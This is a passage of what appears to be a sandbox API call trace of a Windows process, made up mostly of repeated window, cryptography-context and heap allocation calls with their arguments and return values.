dwFlags=0x0) returned 0 [0187.689] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.689] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.689] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.689] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.689] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.689] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.689] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.689] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.689] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.689] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.689] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.689] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.689] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.689] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.689] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.689] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.689] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.689] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.689] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.689] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.689] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.689] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.689] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.689] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.690] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.690] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.690] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.690] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.690] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.690] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.690] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.690] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.690] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.690] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.690] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.690] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.690] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.690] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.690] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.690] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.690] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.690] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.690] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.690] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.690] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.690] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.690] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.691] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.691] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.691] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.691] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.691] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.691] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.691] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.691] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.691] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.691] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.691] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.691] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.691] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.691] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.691] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.691] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.691] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.691] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.691] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.691] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.691] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.691] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.691] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.692] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.692] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.692] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.692] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.692] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.692] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.692] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.692] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.692] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.692] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.692] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.692] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.692] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.692] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.692] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.692] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.692] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.692] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.692] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.692] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.692] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.692] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.692] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.692] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.693] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.693] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.693] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.693] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.693] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.693] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.693] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.693] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.693] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.693] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.693] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.693] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.693] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.693] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.693] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.693] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.693] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.693] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.693] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.693] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.693] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.693] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.693] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.693] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.694] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.694] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.694] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.694] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.694] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.694] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.694] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.694] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.694] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.694] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.694] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.694] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.694] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.694] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.694] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.694] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.694] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.694] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.694] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.694] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.694] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.694] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.694] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.694] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.695] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606800 | out: hHeap=0x5e0000) returned 1 [0187.695] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6067e8 | out: hHeap=0x5e0000) returned 1 [0187.695] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606950 | out: hHeap=0x5e0000) returned 1 [0187.695] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606848 | out: hHeap=0x5e0000) returned 1 [0187.695] GetDialogBaseUnits () returned 1048584 [0187.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606800 [0187.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606728 [0187.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1) returned 0x5fbac0 [0187.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2) returned 0x60d370 [0187.696] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fbac0 | out: hHeap=0x5e0000) returned 1 [0187.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3) returned 0x60d3a0 [0187.696] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d370 | out: hHeap=0x5e0000) returned 1 [0187.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x60d300 [0187.696] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d3a0 | out: hHeap=0x5e0000) returned 1 [0187.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x60d370 [0187.696] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d300 | out: hHeap=0x5e0000) returned 1 [0187.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x9) returned 0x606848 [0187.696] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d370 | out: hHeap=0x5e0000) returned 1 [0187.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xd) returned 0x6067e8 [0187.696] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606848 | out: hHeap=0x5e0000) returned 1 [0187.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x13) returned 0x5fc1f8 [0187.696] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6067e8 | out: hHeap=0x5e0000) returned 1 [0187.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x601778 [0187.696] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fc1f8 | out: hHeap=0x5e0000) returned 1 [0187.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2a) returned 0x5f2cf8 [0187.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x601778 | out: hHeap=0x5e0000) returned 1 [0187.697] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3f) returned 0x60b2c0 [0187.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f2cf8 | out: hHeap=0x5e0000) returned 1 [0187.697] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x5e) returned 0x5f38d0 [0187.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60b2c0 | out: hHeap=0x5e0000) returned 1 [0187.697] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8d) returned 0x5ee258 [0187.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f38d0 | out: hHeap=0x5e0000) returned 1 [0187.697] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xd3) returned 0x5f28e8 [0187.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ee258 | out: hHeap=0x5e0000) returned 1 [0187.697] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x13c) returned 0x60bb00 [0187.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f28e8 | out: hHeap=0x5e0000) returned 1 [0187.697] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1da) returned 0x607648 [0187.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60bb00 | out: hHeap=0x5e0000) returned 1 [0187.697] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2c7) returned 0x60d4b8 [0187.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x607648 | out: hHeap=0x5e0000) returned 1 [0187.697] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x42a) returned 0x60d788 [0187.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d4b8 | out: hHeap=0x5e0000) returned 1 [0187.697] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x63f) returned 0x60dbc0 [0187.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d788 | out: hHeap=0x5e0000) returned 1 [0187.697] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x95e) returned 0x60e208 [0187.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dbc0 | out: hHeap=0x5e0000) returned 1 [0187.697] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe0d) returned 0x60eb70 [0187.698] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60e208 | out: hHeap=0x5e0000) returned 1 [0187.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1536) returned 0x60d4b8 [0187.698] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60eb70 | out: hHeap=0x5e0000) returned 1 [0187.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1fbf) returned 0x60e9f8 [0187.698] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d4b8 | out: hHeap=0x5e0000) returned 1 [0187.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606938 [0187.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6067a0 [0187.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606848 [0187.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606890 [0187.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6067e8 [0187.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606950 [0187.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6067b8 [0187.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6066b0 [0187.698] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606908 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606668 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606680 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6066c8 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6066e0 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606710 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606740 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606758 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606770 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606788 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6067d0 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606c38 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606ae8 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606bd8 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606b78 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606b00 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606b60 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606c20 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6069c8 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6069e0 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606c50 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606b90 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606b30 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606ba8 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606968 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606980 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606998 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6069b0 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6069f8 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606a58 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606a10 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606a70 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606a88 [0187.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606a28 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606bc0 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606b18 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606ad0 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606aa0 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606b48 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606a40 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606ab8 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606bf0 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606c08 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606de8 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606d70 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606ce0 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606d88 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606c98 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606da0 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606db8 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606dd0 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606e00 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606cb0 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606cf8 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606e18 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606d10 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606c68 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606cc8 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606d28 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606c80 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606d40 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606d58 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d350 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d140 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d308 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d278 [0187.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d260 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d290 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d368 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d158 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d1e8 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d200 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d248 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d0e0 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d128 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d1b8 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d170 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d380 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d398 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d2a8 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d218 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d2c0 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d1d0 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d320 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d3c8 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d2d8 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d3b0 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d0f8 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d230 [0187.701] 